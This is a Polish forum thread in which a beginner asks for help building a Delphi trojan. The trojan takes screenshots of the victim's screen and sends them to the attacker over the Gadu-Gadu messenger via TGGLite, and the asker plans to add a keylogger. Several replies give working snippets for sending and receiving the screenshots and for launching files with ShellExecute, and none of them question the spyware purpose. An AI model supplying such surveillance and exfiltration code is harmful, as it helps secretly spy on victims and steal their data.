tgglite odbieranie screenów

squizy0

Użytkownik
Dołączył
Październik 13, 2005
Posty
23
Takie małe pytanko. Mój serwer trojana umie już zrobić screenshota, zapisać go na c: i wysłać
na określony numer(clienta of course). Jak użyć procedury

event OnRecvImage (ImageSize: int; ImageCRC32: int; ImageFrom: int; ImageBody: TMemoryStream)

??

Chciałbym aby przy odebraniu obrazka został on zapisany w jakimś folderze (np. folderze klienta) oraz wyświetlony tak jak jest to zrobione we wspomagaczu, nie wiem na czym nma sie to wyświetlać, na image??

A i jeszcze jakiej uzyc procki do otworzenia np. c:/plik.exe ??
 

tianhao

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
307
Zeby otowrzyc jakis plik to shellexecute bylo juz o tym na forum co do dobierania image to musisz zrobic by klienta mial na liscie swojej numer serwera bo inaczej sie nie da gdyz obrazki nie docieraja do osob ktore nie maja nas na liscie poczytaj o tym na forum c4f.pl byla tam to wyjasnione or skorzystaj z zrodel ggclone i zobacz jak to tam jest zrobione ..
 

damian0170

Użytkownik
Dołączył
Styczeń 16, 2005
Posty
31
Więc tak :roll:
Tak ma być w serwerze :

(Zmień nazwę gglite na 'GG', nie wiem na jakim poziomie programowania jesteś
<
)

procedure TwojaProcedura;
var
ImageFile: TFileStream;
begin
ImageFile:=TFileStream.Create('c:zdjecie.bmp',fmOpenReadWrite);
gg.GGSendImage(true,numerggclienta,'zdjecie.bmp',$FF00FF00,ImageFile);
gg.GGSendImage(false,numerggclienta,'zdjecie.bmp',$FF00FF00,ImageFile);
ImageFile.Free;
end;

a tak wygląda odbiór w cliencie :

procedure TForm1.GGRecvImage(Sender: TObject; ImageSize, ImageCRC32,
ImageFrom: Integer; ImageBody: TMemoryStream);
begin
ImageBody.SaveToFile('c:nazwazdjecia.bmp');
image1.Picture.LoadFromFile(''c:nazwazdjecia.bmp'); // image jest w sam raz ale tylko na (*.bmp);
end;

ale żeby wszystko działało muszisz dodać numer użytkownika (tak jak na gg) a robisz to tak :

procedure TForm1.FormCreate(Sender: TObject);
begin
gg.GGAddUserNotify(numer tej osoby);
end;

A ta procka do otworzenia danego pliku to jak wyżej wspomniał Tianhao 'ShellExecute'.
A robisz to tak :

do uses dodaj ShellAPI

a to cała instrukcja : ShellExecute(Handle,'open','c:ScieżkaPliku',nil,nil,sw_normal);

Myślę że pomogłem
<
 

squizy0

Użytkownik
Dołączył
Październik 13, 2005
Posty
23
dzięki, naprawde bardzo mi pomogliście. Po dłuższym przemyśleniu stwierdziłem że
mój klient do trojana będzie się opierał na ggclone dodanym do tgglite
<
. Oczywiście
tylko opierał bo do okienka rozmowy dodam obraz keylogger zabawa itp.
<

zastanawia mnie jeszcze tylko jedno. Jak zrobić żeby po wgraniu obrazka do image zeskalował się on do rozmiarów komponentu image?? Bo w tej chwili pojawia mi sie w image tylko część screena. Musiałbym zrobić komponent image w takich wielkich rozmiarach a to byłoby raczej nie mądre
<


z tym już sobie poradziłem, wystarczyło zaznaczyć proportional
<
. Zastanawia mnie teraz
jak zrobić aby po kliknięciu w image, albo w button otwierało się nowe okienko ze screenem
w full rozmiarze.
 

tianhao

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
307
<div class='quotetop'>CYTAT("squizy0")</div>
dzięki, naprawde bardzo mi pomogliście. Po dłuższym przemyśleniu stwierdziłem że
mój klient do trojana będzie się opierał na ggclone dodanym do tgglite
<
. Oczywiście
tylko opierał bo do okienka rozmowy dodam obraz keylogger zabawa itp.
<

zastanawia mnie jeszcze tylko jedno. Jak zrobić żeby po wgraniu obrazka do image zeskalował się on do rozmiarów komponentu image?? Bo w tej chwili pojawia mi sie w image tylko część screena. Musiałbym zrobić komponent image w takich wielkich rozmiarach a to byłoby raczej nie mądre
<


z tym już sobie poradziłem, wystarczyło zaznaczyć proportional
<
. Zastanawia mnie teraz
jak zrobić aby po kliknięciu w image, albo w button otwierało się nowe okienko ze screenem
w full rozmiarze.[/b]
hmm zrob nowa forme z image ? w fullwymiarach ?
 

squizy0

Użytkownik
Dołączył
Październik 13, 2005
Posty
23
też o tym pomyślałem, ale nie wiem jak odwołać kliknięcie butona do pojawienia się nowej formy
<
(bardzo podstawowa informacja wiem, no ale po prostu nie umiem
<
)
 

blackhat

Użytkownik
Dołączył
Listopad 28, 2004
Posty
55
File>New>Form

a na formie1 podepnij np pod button taką akcję

Form2 := Form2.Create(Self);
Form2.ShowModal;
Form2.Free;
 

squizy0

Użytkownik
Dołączył
Październik 13, 2005
Posty
23
naprawdę strasznie wszystkim dziękuję. Moje pytania są żałosne, dlatego też tymbardziej doceniam to że mi pomogliście. Projekt mojego trojana jest już prawie w połowie skończony. Dziwi mnie że w ciągu 2 tygodni nauczyłem sie podstaw obsługi delphi. Do miana programatora brakuje mi kilka lat, ale i tak jestem zadowolony z tego co już poznałem
<
 
Do góry Bottom